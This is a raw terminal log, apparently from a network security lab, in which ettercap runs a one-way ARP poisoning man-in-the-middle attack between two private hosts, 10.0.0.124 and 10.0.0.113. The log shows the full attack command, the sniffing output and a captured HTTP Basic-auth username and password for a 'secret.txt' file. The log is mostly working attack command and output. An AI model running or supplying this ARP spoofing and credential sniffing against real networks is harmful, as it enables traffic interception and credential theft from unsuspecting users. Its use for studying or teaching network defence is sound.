team@nslabu:~$ sudo ettercap -i tap0 -T -M arp:oneway /10.0.0.124/ /10.0.0.113/

ettercap NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA

Listening on tap0... (Ethernet)

  tap0 ->       2A:A0:3C:CF:E6:B7         10.0.0.21     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  41 protocol dissectors
  56 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 10.0.0.124 00:50:56:9F:5A:33

 GROUP 2 : 10.0.0.113 08:00:27:7B:11:4C
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help



Tue Oct 13 17:34:13 2015
TCP  10.0.0.124:60903 --> 10.0.0.113:80 | S


Accept: */*.
Host: 10.0.0.113.
Connection: Keep-Alive.
.

HTTP : 10.0.0.113:80 -> USER: mrboss  PASS: Str0ngPa55  INFO: 10.0.0.113/secure/secret.txt


Tue Oct 13 17:56:12 2015
TCP  10.0.0.124:60914 --> 10.0.0.113:80 | A




Tue Oct 13 17:56:12 2015
TCP  10.0.0.124:60914 --> 10.0.0.113:80 | A




Tue Oct 13 17:56:12 2015
TCP  10.0.0.124:60914 --> 10.0.0.113:80 | AP

GET /secure/secret.txt HTTP/1.0.
User-Agent: Wget/1.12 (linux-gnu).
Accept: */*.
Host: 10.0.0.113.
Connection: Keep-Alive.
Authorization: Basic bXJib3NzOlN0cjBuZ1BhNTU=.
.



Tue Oct 13 17:56:12 2015
TCP  10.0.0.124:60914 --> 10.0.0.113:80 | FA




Tue Oct 13 17:56:12 2015
TCP  10.0.0.124:60914 --> 10.0.0.113:80 | A

Closing text interface...

ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
